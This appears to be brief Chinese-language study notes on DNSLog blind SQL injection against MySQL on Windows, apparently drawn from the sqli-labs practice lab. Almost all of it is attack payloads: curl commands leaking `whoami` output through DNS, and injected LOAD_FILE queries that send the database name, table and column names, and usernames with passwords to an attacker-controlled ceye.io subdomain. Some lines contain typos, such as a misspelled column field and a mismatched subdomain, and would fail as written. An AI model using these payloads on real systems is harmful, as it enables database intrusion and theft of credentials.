需要目标机器时windows系统
DnsLog盲注
DnsLog盲注原理
Dnslog平台:http://ceye.io/
http://ceye.io/profile
curl mzq83x.ceye.io
curl `whoami`.mzq83x.ceye.io
DnsLog盲注方法
核心语法: SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.r5ourp.ceye.io\\abc'));
sql语句不能含有特殊符号
查表
?id=1' and LOAD_FILE(CONCAT('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5oup.ceye.io\\abc'))--+
?id=1' and LOAD_FILE(CONCAT('\\\\',(select colum_name from information_schema.columns where table_name='users' limit 5,1),'.mysql.r5ourp.ceye.io\\abc'))--+
?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat(username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat_ws('A',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
?id=1' and LOAD_FILE(CONCAT('\\\\',(select hex('~',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+